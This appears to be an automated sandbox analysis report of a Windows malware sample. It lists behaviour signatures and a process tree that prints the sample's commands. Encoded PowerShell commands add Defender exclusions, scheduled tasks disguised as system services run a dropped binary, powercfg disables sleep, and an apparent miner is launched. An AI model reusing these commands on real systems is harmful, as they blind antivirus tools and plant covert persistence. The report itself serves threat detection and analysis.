3cb16ca6374fc2f9da621e613bdc5b22a55c6b481d4cdd2351f82fb906cd5fed

Analysis

max time kernel
303s
max time network
312s
platform
windows10-1703_x64
resource
win10-20220901-en
resource tags

arch:x64arch:x86image:win10-20220901-enlocale:en-usos:windows10-1703-x64system
submitted
13/09/2022, 22:18

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

3cb16ca6374fc2f9da621e613bdc5b22a55c6b481d4cdd2351f82fb906cd5fed.exe
Size

700.1MB
MD5

8a473d5812921e6ed01cc9b473485d95
SHA1

d900cc3370ca0f38946e9180eed6034e09686538
SHA256

3cb16ca6374fc2f9da621e613bdc5b22a55c6b481d4cdd2351f82fb906cd5fed
SHA512

cf88c9801505c99c20055b876497440d62dac1553e510045520e3bf87e3848be28227cd279fec62397750e183e1e48fbeb4863465947c3d923bf5844d0b655d4
SSDEEP

6144:RvowTjLao/Z79b6E1DzbkaWwgJKbSVR1K:/DR7AEeaWwgJKbSVR1K

Score

8^/10

Malware Config

Signatures

Downloads MZ/PE file

Drops file in Drivers directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\system32\drivers\etc\hosts	3cb16ca6374fc2f9da621e613bdc5b22a55c6b481d4cdd2351f82fb906cd5fed.exe

Executes dropped EXE 1 IoCs

pid	Process
1632	dllhost.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102

Creates scheduled task(s) 1 TTPs 9 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task

T1053

pid	Process
4732	schtasks.exe
3928	schtasks.exe
4904	schtasks.exe
1616	schtasks.exe
1964	schtasks.exe
1868	schtasks.exe
1544	schtasks.exe
2220	schtasks.exe
3588	schtasks.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
1448	3cb16ca6374fc2f9da621e613bdc5b22a55c6b481d4cdd2351f82fb906cd5fed.exe
4876	powershell.exe
4876	powershell.exe
4876	powershell.exe
3716	powershell.exe
1540	powershell.exe
1636	powershell.exe
512	powershell.exe
3292	powershell.exe
1632	dllhost.exe
1632	dllhost.exe
1632	dllhost.exe
1632	dllhost.exe
1632	dllhost.exe
1632	dllhost.exe
1540	powershell.exe
3716	powershell.exe
3292	powershell.exe
1636	powershell.exe
1632	dllhost.exe
512	powershell.exe
1632	dllhost.exe
1632	dllhost.exe
1632	dllhost.exe
3292	powershell.exe
1632	dllhost.exe
1632	dllhost.exe
1632	dllhost.exe
1632	dllhost.exe
1636	powershell.exe
3716	powershell.exe
1632	dllhost.exe
1540	powershell.exe
1632	dllhost.exe
512	powershell.exe
1632	dllhost.exe
1632	dllhost.exe
1632	dllhost.exe
1632	dllhost.exe
1632	dllhost.exe
1632	dllhost.exe
1632	dllhost.exe
1632	dllhost.exe
1632	dllhost.exe
1632	dllhost.exe
1632	dllhost.exe
1632	dllhost.exe
1632	dllhost.exe
1632	dllhost.exe
1632	dllhost.exe
1632	dllhost.exe
1632	dllhost.exe
1632	dllhost.exe
1632	dllhost.exe
1632	dllhost.exe
1632	dllhost.exe
1632	dllhost.exe
1632	dllhost.exe
1632	dllhost.exe
1632	dllhost.exe
1632	dllhost.exe
1632	dllhost.exe
1632	dllhost.exe
1632	dllhost.exe

Suspicious use of AdjustPrivilegeToken 20 IoCs

description	pid	Process
Token: SeDebugPrivilege	1448	3cb16ca6374fc2f9da621e613bdc5b22a55c6b481d4cdd2351f82fb906cd5fed.exe
Token: SeDebugPrivilege	4876	powershell.exe
Token: SeDebugPrivilege	1632	dllhost.exe
Token: SeShutdownPrivilege	4652	powercfg.exe
Token: SeCreatePagefilePrivilege	4652	powercfg.exe
Token: SeShutdownPrivilege	308	powercfg.exe
Token: SeCreatePagefilePrivilege	308	powercfg.exe
Token: SeDebugPrivilege	1636	powershell.exe
Token: SeDebugPrivilege	1540	powershell.exe
Token: SeDebugPrivilege	3716	powershell.exe
Token: SeDebugPrivilege	512	powershell.exe
Token: SeDebugPrivilege	3292	powershell.exe
Token: SeShutdownPrivilege	4676	powercfg.exe
Token: SeCreatePagefilePrivilege	4676	powercfg.exe
Token: SeShutdownPrivilege	4720	powercfg.exe
Token: SeCreatePagefilePrivilege	4720	powercfg.exe
Token: SeShutdownPrivilege	2840	powercfg.exe
Token: SeCreatePagefilePrivilege	2840	powercfg.exe
Token: SeShutdownPrivilege	2840	powercfg.exe
Token: SeCreatePagefilePrivilege	2840	powercfg.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1448 wrote to memory of 4272	1448	3cb16ca6374fc2f9da621e613bdc5b22a55c6b481d4cdd2351f82fb906cd5fed.exe	67
PID 1448 wrote to memory of 4272	1448	3cb16ca6374fc2f9da621e613bdc5b22a55c6b481d4cdd2351f82fb906cd5fed.exe	67
PID 1448 wrote to memory of 4272	1448	3cb16ca6374fc2f9da621e613bdc5b22a55c6b481d4cdd2351f82fb906cd5fed.exe	67
PID 4272 wrote to memory of 4876	4272	cmd.exe	69
PID 4272 wrote to memory of 4876	4272	cmd.exe	69
PID 4272 wrote to memory of 4876	4272	cmd.exe	69
PID 1448 wrote to memory of 1632	1448	3cb16ca6374fc2f9da621e613bdc5b22a55c6b481d4cdd2351f82fb906cd5fed.exe	70
PID 1448 wrote to memory of 1632	1448	3cb16ca6374fc2f9da621e613bdc5b22a55c6b481d4cdd2351f82fb906cd5fed.exe	70
PID 1448 wrote to memory of 1632	1448	3cb16ca6374fc2f9da621e613bdc5b22a55c6b481d4cdd2351f82fb906cd5fed.exe	70
PID 1448 wrote to memory of 2168	1448	3cb16ca6374fc2f9da621e613bdc5b22a55c6b481d4cdd2351f82fb906cd5fed.exe	71
PID 1448 wrote to memory of 2168	1448	3cb16ca6374fc2f9da621e613bdc5b22a55c6b481d4cdd2351f82fb906cd5fed.exe	71
PID 1448 wrote to memory of 2168	1448	3cb16ca6374fc2f9da621e613bdc5b22a55c6b481d4cdd2351f82fb906cd5fed.exe	71
PID 1448 wrote to memory of 2640	1448	3cb16ca6374fc2f9da621e613bdc5b22a55c6b481d4cdd2351f82fb906cd5fed.exe	73
PID 1448 wrote to memory of 2640	1448	3cb16ca6374fc2f9da621e613bdc5b22a55c6b481d4cdd2351f82fb906cd5fed.exe	73
PID 1448 wrote to memory of 2640	1448	3cb16ca6374fc2f9da621e613bdc5b22a55c6b481d4cdd2351f82fb906cd5fed.exe	73
PID 1448 wrote to memory of 1860	1448	3cb16ca6374fc2f9da621e613bdc5b22a55c6b481d4cdd2351f82fb906cd5fed.exe	72
PID 1448 wrote to memory of 1860	1448	3cb16ca6374fc2f9da621e613bdc5b22a55c6b481d4cdd2351f82fb906cd5fed.exe	72
PID 1448 wrote to memory of 1860	1448	3cb16ca6374fc2f9da621e613bdc5b22a55c6b481d4cdd2351f82fb906cd5fed.exe	72
PID 1448 wrote to memory of 4764	1448	3cb16ca6374fc2f9da621e613bdc5b22a55c6b481d4cdd2351f82fb906cd5fed.exe	75
PID 1448 wrote to memory of 4764	1448	3cb16ca6374fc2f9da621e613bdc5b22a55c6b481d4cdd2351f82fb906cd5fed.exe	75
PID 1448 wrote to memory of 4764	1448	3cb16ca6374fc2f9da621e613bdc5b22a55c6b481d4cdd2351f82fb906cd5fed.exe	75
PID 1448 wrote to memory of 4840	1448	3cb16ca6374fc2f9da621e613bdc5b22a55c6b481d4cdd2351f82fb906cd5fed.exe	74
PID 1448 wrote to memory of 4840	1448	3cb16ca6374fc2f9da621e613bdc5b22a55c6b481d4cdd2351f82fb906cd5fed.exe	74
PID 1448 wrote to memory of 4840	1448	3cb16ca6374fc2f9da621e613bdc5b22a55c6b481d4cdd2351f82fb906cd5fed.exe	74
PID 1448 wrote to memory of 5088	1448	3cb16ca6374fc2f9da621e613bdc5b22a55c6b481d4cdd2351f82fb906cd5fed.exe	85
PID 1448 wrote to memory of 5088	1448	3cb16ca6374fc2f9da621e613bdc5b22a55c6b481d4cdd2351f82fb906cd5fed.exe	85
PID 1448 wrote to memory of 5088	1448	3cb16ca6374fc2f9da621e613bdc5b22a55c6b481d4cdd2351f82fb906cd5fed.exe	85
PID 1448 wrote to memory of 4224	1448	3cb16ca6374fc2f9da621e613bdc5b22a55c6b481d4cdd2351f82fb906cd5fed.exe	77
PID 1448 wrote to memory of 4224	1448	3cb16ca6374fc2f9da621e613bdc5b22a55c6b481d4cdd2351f82fb906cd5fed.exe	77
PID 1448 wrote to memory of 4224	1448	3cb16ca6374fc2f9da621e613bdc5b22a55c6b481d4cdd2351f82fb906cd5fed.exe	77
PID 1448 wrote to memory of 4088	1448	3cb16ca6374fc2f9da621e613bdc5b22a55c6b481d4cdd2351f82fb906cd5fed.exe	84
PID 1448 wrote to memory of 4088	1448	3cb16ca6374fc2f9da621e613bdc5b22a55c6b481d4cdd2351f82fb906cd5fed.exe	84
PID 1448 wrote to memory of 4088	1448	3cb16ca6374fc2f9da621e613bdc5b22a55c6b481d4cdd2351f82fb906cd5fed.exe	84
PID 1448 wrote to memory of 3436	1448	3cb16ca6374fc2f9da621e613bdc5b22a55c6b481d4cdd2351f82fb906cd5fed.exe	82
PID 1448 wrote to memory of 3436	1448	3cb16ca6374fc2f9da621e613bdc5b22a55c6b481d4cdd2351f82fb906cd5fed.exe	82
PID 1448 wrote to memory of 3436	1448	3cb16ca6374fc2f9da621e613bdc5b22a55c6b481d4cdd2351f82fb906cd5fed.exe	82
PID 1448 wrote to memory of 4060	1448	3cb16ca6374fc2f9da621e613bdc5b22a55c6b481d4cdd2351f82fb906cd5fed.exe	81
PID 1448 wrote to memory of 4060	1448	3cb16ca6374fc2f9da621e613bdc5b22a55c6b481d4cdd2351f82fb906cd5fed.exe	81
PID 1448 wrote to memory of 4060	1448	3cb16ca6374fc2f9da621e613bdc5b22a55c6b481d4cdd2351f82fb906cd5fed.exe	81
PID 1448 wrote to memory of 4252	1448	3cb16ca6374fc2f9da621e613bdc5b22a55c6b481d4cdd2351f82fb906cd5fed.exe	86
PID 1448 wrote to memory of 4252	1448	3cb16ca6374fc2f9da621e613bdc5b22a55c6b481d4cdd2351f82fb906cd5fed.exe	86
PID 1448 wrote to memory of 4252	1448	3cb16ca6374fc2f9da621e613bdc5b22a55c6b481d4cdd2351f82fb906cd5fed.exe	86
PID 1448 wrote to memory of 1288	1448	3cb16ca6374fc2f9da621e613bdc5b22a55c6b481d4cdd2351f82fb906cd5fed.exe	88
PID 1448 wrote to memory of 1288	1448	3cb16ca6374fc2f9da621e613bdc5b22a55c6b481d4cdd2351f82fb906cd5fed.exe	88
PID 1448 wrote to memory of 1288	1448	3cb16ca6374fc2f9da621e613bdc5b22a55c6b481d4cdd2351f82fb906cd5fed.exe	88
PID 1448 wrote to memory of 816	1448	3cb16ca6374fc2f9da621e613bdc5b22a55c6b481d4cdd2351f82fb906cd5fed.exe	95
PID 1448 wrote to memory of 816	1448	3cb16ca6374fc2f9da621e613bdc5b22a55c6b481d4cdd2351f82fb906cd5fed.exe	95
PID 1448 wrote to memory of 816	1448	3cb16ca6374fc2f9da621e613bdc5b22a55c6b481d4cdd2351f82fb906cd5fed.exe	95
PID 1448 wrote to memory of 4032	1448	3cb16ca6374fc2f9da621e613bdc5b22a55c6b481d4cdd2351f82fb906cd5fed.exe	94
PID 1448 wrote to memory of 4032	1448	3cb16ca6374fc2f9da621e613bdc5b22a55c6b481d4cdd2351f82fb906cd5fed.exe	94
PID 1448 wrote to memory of 4032	1448	3cb16ca6374fc2f9da621e613bdc5b22a55c6b481d4cdd2351f82fb906cd5fed.exe	94
PID 2168 wrote to memory of 1616	2168	cmd.exe	99
PID 2168 wrote to memory of 1616	2168	cmd.exe	99
PID 2168 wrote to memory of 1616	2168	cmd.exe	99
PID 1860 wrote to memory of 1964	1860	cmd.exe	100
PID 1860 wrote to memory of 1964	1860	cmd.exe	100
PID 1860 wrote to memory of 1964	1860	cmd.exe	100
PID 2640 wrote to memory of 1868	2640	cmd.exe	101
PID 2640 wrote to memory of 1868	2640	cmd.exe	101
PID 2640 wrote to memory of 1868	2640	cmd.exe	101
PID 4764 wrote to memory of 2220	4764	cmd.exe	102
PID 4764 wrote to memory of 2220	4764	cmd.exe	102
PID 4764 wrote to memory of 2220	4764	cmd.exe	102
PID 3436 wrote to memory of 1540	3436	cmd.exe	109

C:\Users\Admin\AppData\Local\Temp\3cb16ca6374fc2f9da621e613bdc5b22a55c6b481d4cdd2351f82fb906cd5fed.exe
"C:\Users\Admin\AppData\Local\Temp\3cb16ca6374fc2f9da621e613bdc5b22a55c6b481d4cdd2351f82fb906cd5fed.exe"
1⤵
- Drops file in Drivers directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1448
- C:\Windows\SysWOW64\cmd.exe
  "cmd.exe" /C powershell -EncodedCommand "PAAjAGUARgByAHMATABqAHUAIwA+ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgADwAIwB0AGoANgBnAHUAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAMwBoAG8AUQBvADgAcwAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwBhAEYASgBvAEoATAA4AGQARwBuAEwAIwA+AA=="
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4272
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    powershell -EncodedCommand "PAAjAGUARgByAHMATABqAHUAIwA+ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgADwAIwB0AGoANgBnAHUAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAMwBoAG8AUQBvADgAcwAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwBhAEYASgBvAEoATAA4AGQARwBuAEwAIwA+AA=="
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:4876
- C:\ProgramData\Dllhost\dllhost.exe
  "C:\ProgramData\Dllhost\dllhost.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1632
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /c chcp 1251 & C:\ProgramData\Dllhost\winlogson.exe -c config.json
    3⤵
    PID:3128
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /c chcp 1251 & C:\ProgramData\Dllhost\winlogson.exe -c config.json
    3⤵
    PID:4224
  - - C:\Windows\SysWOW64\chcp.com
      chcp 1251
      4⤵
      PID:4332
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /c chcp 1251 & C:\ProgramData\Dllhost\winlogson.exe -c config.json
    3⤵
    PID:4400
  - - C:\Windows\SysWOW64\chcp.com
      chcp 1251
      4⤵
      PID:4632
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /c chcp 1251 & C:\ProgramData\Dllhost\winlogson.exe -c config.json
    3⤵
    PID:4024
  - - C:\Windows\SysWOW64\chcp.com
      chcp 1251
      4⤵
      PID:3116
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /c chcp 1251 & C:\ProgramData\Dllhost\winlogson.exe -c config.json
    3⤵
    PID:4796
  - - C:\Windows\SysWOW64\chcp.com
      chcp 1251
      4⤵
      PID:3256
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /c chcp 1251 & C:\ProgramData\Dllhost\winlogson.exe -c config.json
    3⤵
    PID:3848
  - - C:\Windows\SysWOW64\chcp.com
      chcp 1251
      4⤵
      PID:608
- C:\Windows\SysWOW64\cmd.exe
  "cmd.exe" /C echo еOЪJФ & SCHTASKS /CREATE /SC HOURLY /TN "SecurityHealthSystray" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f & echo QКчРо
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2168
- - C:\Windows\SysWOW64\schtasks.exe
    SCHTASKS /CREATE /SC HOURLY /TN "SecurityHealthSystray" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f
    3⤵
    - Creates scheduled task(s)
    PID:1616
- C:\Windows\SysWOW64\cmd.exe
  "cmd.exe" /C echo иKNпс1kВхIЬ & SCHTASKS /CREATE /SC HOURLY /TN "WmiPrvSE" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f & echo cдшТqЛEGУ76шю4UCp
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1860
- - C:\Windows\SysWOW64\schtasks.exe
    SCHTASKS /CREATE /SC HOURLY /TN "WmiPrvSE" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f
    3⤵
    - Creates scheduled task(s)
    PID:1964
- C:\Windows\SysWOW64\cmd.exe
  "cmd.exe" /C echo dЪAк8ЩШ & SCHTASKS /CREATE /SC HOURLY /TN "WindowsDefender" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f & echo iZнЙтW
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2640
- - C:\Windows\SysWOW64\schtasks.exe
    SCHTASKS /CREATE /SC HOURLY /TN "WindowsDefender" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f
    3⤵
    - Creates scheduled task(s)
    PID:1868
- C:\Windows\SysWOW64\cmd.exe
  "cmd.exe" /C echo 03R & SCHTASKS /CREATE /SC HOURLY /TN "dllhost" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f & echo
  2⤵
  PID:4840
- - C:\Windows\SysWOW64\schtasks.exe
    SCHTASKS /CREATE /SC HOURLY /TN "dllhost" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f
    3⤵
    - Creates scheduled task(s)
    PID:1544
- C:\Windows\SysWOW64\cmd.exe
  "cmd.exe" /C echo kщ5яр8VGЧССЬоFй & SCHTASKS /CREATE /SC HOURLY /TN "AntiMalwareServiceExecutable" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f & echo Едк2YФ8qШEЗУРEgВбЕ
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4764
- - C:\Windows\SysWOW64\schtasks.exe
    SCHTASKS /CREATE /SC HOURLY /TN "AntiMalwareServiceExecutable" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f
    3⤵
    - Creates scheduled task(s)
    PID:2220
- C:\Windows\SysWOW64\cmd.exe
  "cmd.exe" /C echo жаVсОlE & SCHTASKS /CREATE /SC HOURLY /TN "OneDriveService" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f & echo ij83р4ХнРxЗdZамhх
  2⤵
  PID:4224
- - C:\Windows\SysWOW64\schtasks.exe
    SCHTASKS /CREATE /SC HOURLY /TN "OneDriveService" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f
    3⤵
    - Creates scheduled task(s)
    PID:3928
- C:\Windows\SysWOW64\cmd.exe
  "cmd.exe" /C powershell -EncodedCommand "PAAjAE8EJgQQBDgAJwRNACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAFAQyADgAMQQjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIAA8ACMAdQBHBHcAIwA+ACAAQAAoACAAPAAjAB8EUgBHBEgAbQAVBBsENwRWAEgERwBRACMAPgAgACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAgADwAIwA1BBwEegAWBCYENQRGACEERQB1ACMAPgAgACQAZQBuAHYAOgBQAHIAbwBnAHIAYQBtAEQAYQB0AGEAKQAgADwAIwBCADQEcwA8BBAETQRyAFIAFwR5ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjACEEawBqAEUAGwQSBEwAbQBYAGcAIwA+AA=="
  2⤵
  PID:4060
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    powershell -EncodedCommand "PAAjAE8EJgQQBDgAJwRNACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAFAQyADgAMQQjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIAA8ACMAdQBHBHcAIwA+ACAAQAAoACAAPAAjAB8EUgBHBEgAbQAVBBsENwRWAEgERwBRACMAPgAgACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAgADwAIwA1BBwEegAWBCYENQRGACEERQB1ACMAPgAgACQAZQBuAHYAOgBQAHIAbwBnAHIAYQBtAEQAYQB0AGEAKQAgADwAIwBCADQEcwA8BBAETQRyAFIAFwR5ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjACEEawBqAEUAGwQSBEwAbQBYAGcAIwA+AA=="
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1636
- C:\Windows\SysWOW64\cmd.exe
  "cmd.exe" /C powershell -EncodedCommand "PAAjACwEUgBDAGsAIwA+ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgADwAIwArBCsEUgAeBEMEIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAPAAjACwEZgAUBE8AbwBIBC8EeQA1AG8AMQRVABgEIwA+ACAAQAAoACAAPAAjAGYAJARmAD8EHQRLBDkAMQA2AEwEOARTAEYAGwR5ACMAPgAgACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAgADwAIwBLBDQASwQ/BDQEVABrAHYAcwAjAD4AIAAkAGUAbgB2ADoAUAByAG8AZwByAGEAbQBEAGEAdABhACkAIAA8ACMASwBSADoEZQBFACIERwBsAEEAYgApBEwEbgAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwBUAEkESgR4ADIEIwRMAGUAYQAWBEMESwAaBFEAIwA+AA=="
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3436
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    powershell -EncodedCommand "PAAjACwEUgBDAGsAIwA+ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgADwAIwArBCsEUgAeBEMEIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAPAAjACwEZgAUBE8AbwBIBC8EeQA1AG8AMQRVABgEIwA+ACAAQAAoACAAPAAjAGYAJARmAD8EHQRLBDkAMQA2AEwEOARTAEYAGwR5ACMAPgAgACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAgADwAIwBLBDQASwQ/BDQEVABrAHYAcwAjAD4AIAAkAGUAbgB2ADoAUAByAG8AZwByAGEAbQBEAGEAdABhACkAIAA8ACMASwBSADoEZQBFACIERwBsAEEAYgApBEwEbgAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwBUAEkESgR4ADIEIwRMAGUAYQAWBEMESwAaBFEAIwA+AA=="
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1540
- C:\Windows\SysWOW64\cmd.exe
  "cmd.exe" /C echo tgXСQn & SCHTASKS /CREATE /SC HOURLY /TN "NvStray" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f & echo оZБйHYCнЬ
  2⤵
  PID:4088
- - C:\Windows\SysWOW64\schtasks.exe
    SCHTASKS /CREATE /SC HOURLY /TN "NvStray" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f
    3⤵
    - Creates scheduled task(s)
    PID:4732
- C:\Windows\SysWOW64\cmd.exe
  "cmd.exe" /C echo ы & SCHTASKS /CREATE /SC HOURLY /TN "MicrosoftEdgeUpd" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f & echo МKNЕХAhЗэтмчWDkPА
  2⤵
  PID:5088
- - C:\Windows\SysWOW64\schtasks.exe
    SCHTASKS /CREATE /SC HOURLY /TN "MicrosoftEdgeUpd" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f
    3⤵
    - Creates scheduled task(s)
    PID:3588
- C:\Windows\SysWOW64\cmd.exe
  "cmd.exe" /C powershell -EncodedCommand "PAAjAE0AFAQ6BDUEdgBZAHUALQQaBEAEdwBrAGcAIwA+ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgADwAIwBABHkAPAQ8BFoAFgQ6BFkAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAPAAjAGEAcAAkBEMEPwRXADQEcwAaBEgEWgBSAEUAeAAjAD4AIABAACgAIAA8ACMARgQxBHcAHgQwAC4EIwA+ACAAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACAAPAAjAC4EYwATBEkATQRLBFkALARxAEsAGwRiACMAPgAgACQAZQBuAHYAOgBQAHIAbwBnAHIAYQBtAEQAYQB0AGEAKQAgADwAIwBaAFAAHgQ9BD0EcAA5AFoANQQjAD4AIAAtAEYAbwByAGMAZQAgADwAIwBtAFcAYgBUAHoATwQxBD8EEQQbBCMAPgA="
  2⤵
  PID:4252
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    powershell -EncodedCommand "PAAjAE0AFAQ6BDUEdgBZAHUALQQaBEAEdwBrAGcAIwA+ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgADwAIwBABHkAPAQ8BFoAFgQ6BFkAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAPAAjAGEAcAAkBEMEPwRXADQEcwAaBEgEWgBSAEUAeAAjAD4AIABAACgAIAA8ACMARgQxBHcAHgQwAC4EIwA+ACAAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACAAPAAjAC4EYwATBEkATQRLBFkALARxAEsAGwRiACMAPgAgACQAZQBuAHYAOgBQAHIAbwBnAHIAYQBtAEQAYQB0AGEAKQAgADwAIwBaAFAAHgQ9BD0EcAA5AFoANQQjAD4AIAAtAEYAbwByAGMAZQAgADwAIwBtAFcAYgBUAHoATwQxBD8EEQQbBCMAPgA="
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:3716
- C:\Windows\SysWOW64\cmd.exe
  "cmd.exe" /C powershell -EncodedCommand "PAAjAHEAFwRCBFMAQgQjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjABkEHQQjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIAA8ACMAcAA0AEQANgQvBHYAJAQjAD4AIABAACgAIAA8ACMAUwBMAEYEVQA2AFYAQQQgBDYERAB5ACMAPgAgACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAgADwAIwBZADYEFgRvAEoASQAjAD4AIAAkAGUAbgB2ADoAUAByAG8AZwByAGEAbQBEAGEAdABhACkAIAA8ACMAdgB3ABcEaQBOBDAEbwA6BDQEIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAUgAyAGQAJQQjAD4A"
  2⤵
  PID:1288
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    powershell -EncodedCommand "PAAjAHEAFwRCBFMAQgQjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjABkEHQQjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIAA8ACMAcAA0AEQANgQvBHYAJAQjAD4AIABAACgAIAA8ACMAUwBMAEYEVQA2AFYAQQQgBDYERAB5ACMAPgAgACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAgADwAIwBZADYEFgRvAEoASQAjAD4AIAAkAGUAbgB2ADoAUAByAG8AZwByAGEAbQBEAGEAdABhACkAIAA8ACMAdgB3ABcEaQBOBDAEbwA6BDQEIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAUgAyAGQAJQQjAD4A"
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:3292
- C:\Windows\SysWOW64\cmd.exe
  "cmd.exe" /C powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0 & powercfg /hibernate off & echo ТббdWcмhMXИ & SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "ActivationRule" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f & echo
  2⤵
  PID:4032
- - C:\Windows\SysWOW64\powercfg.exe
    powercfg /x -hibernate-timeout-ac 0
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:4652
- - C:\Windows\SysWOW64\powercfg.exe
    powercfg /x -hibernate-timeout-dc 0
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:308
- - C:\Windows\SysWOW64\powercfg.exe
    powercfg /x -standby-timeout-ac 0
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:4676
- - C:\Windows\SysWOW64\powercfg.exe
    powercfg /x -standby-timeout-dc 0
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:4720
- - C:\Windows\SysWOW64\powercfg.exe
    powercfg /hibernate off
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:2840
- - C:\Windows\SysWOW64\schtasks.exe
